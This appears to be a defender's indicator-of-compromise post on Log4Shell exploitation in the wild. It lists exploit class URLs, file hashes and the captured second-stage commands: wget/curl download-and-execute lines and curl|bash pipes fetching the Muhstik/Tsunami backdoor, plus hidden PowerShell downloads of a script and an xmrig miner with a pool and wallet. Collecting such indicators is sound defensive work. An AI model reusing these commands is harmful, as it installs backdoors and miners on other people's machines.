Log4j Payload Dropped
45.130.229.168:1389/Exploit.class | |
Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b | |
--> curl http://18.228.7.109/.log/log | |
log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b | |
--> download of Muhstik/Tsunami backdoor
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 & | |
wget -O /tmp/pty4 http://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 & | |
wget -O /tmp/pty2 http://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 & | |
wget -O /tmp/pty1 http://18.228.7.109/.log/pty1; chmod +x /tmp/pty1; chmod 700 /tmp/pty1; /tmp/pty1 & | |
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 & | |
wget -O /tmp/pty5 http://18.228.7.109/.log/pty5; chmod +x /tmp/pty5; chmod 700 /tmp/pty5; /tmp/pty5 & | |
pty3 4f34f8f156fdf12e0817a610344b11abdee87cfbed862bf91eb7685c63696898 | |
--> download of Muhstik/Tsunami
(curl http://210.141.105.67:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://210.141.105.67:80/wp-content/themes/twentythirteen/m8)|bash | |
(curl http://210.141.105.67:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://210.141.105.67:80/wp-content/themes/twentythirteen/m8)|bash | |
(curl http://159.89.182.117/wp-content/themes/twentyseventeen/ldm || wget -qO - http://159.89.182.117/wp-content/themes/twentyseventeen/ldm)|bash | |
m8 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514 | |
ldm 39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129 | |
######
Exploit.class | |
2b5f04d15e459132a5935260746788db39b469ea46859c4a5bb8625f8a80bd41 | |
--> uses curl on Linux for download of http://18.228.7.109/.log/log
--> and uses PowerShell on Windows
(new-object System.Net.WebClient).Downloadfile('http://172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd', 's.cmd') | |
s.cmd 8A009DEE6BFB6F79C0881F5D150EEAD92C93354D47FD1CB204791320D2151634 | |
--> downloads xmrig
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://54.210.230.186:80/wp-content/themes/twentyfourteen/xmrig.exe','xmrig.exe') | |
xmrig.exe -o pool.supportxmr.com:5555 -u 46QBumovWy4dLJ4R8wq8JwhHKWMhCaDyNDEzvxHFmAHn92EyKrttq6LfV6if5UYDAyCzh3egWXMhnfJJrEhWkMzqTPzGzsE -p log |
thanks buddy!
added in here https://github.com/hackinghippo/log4shell_ioc_ips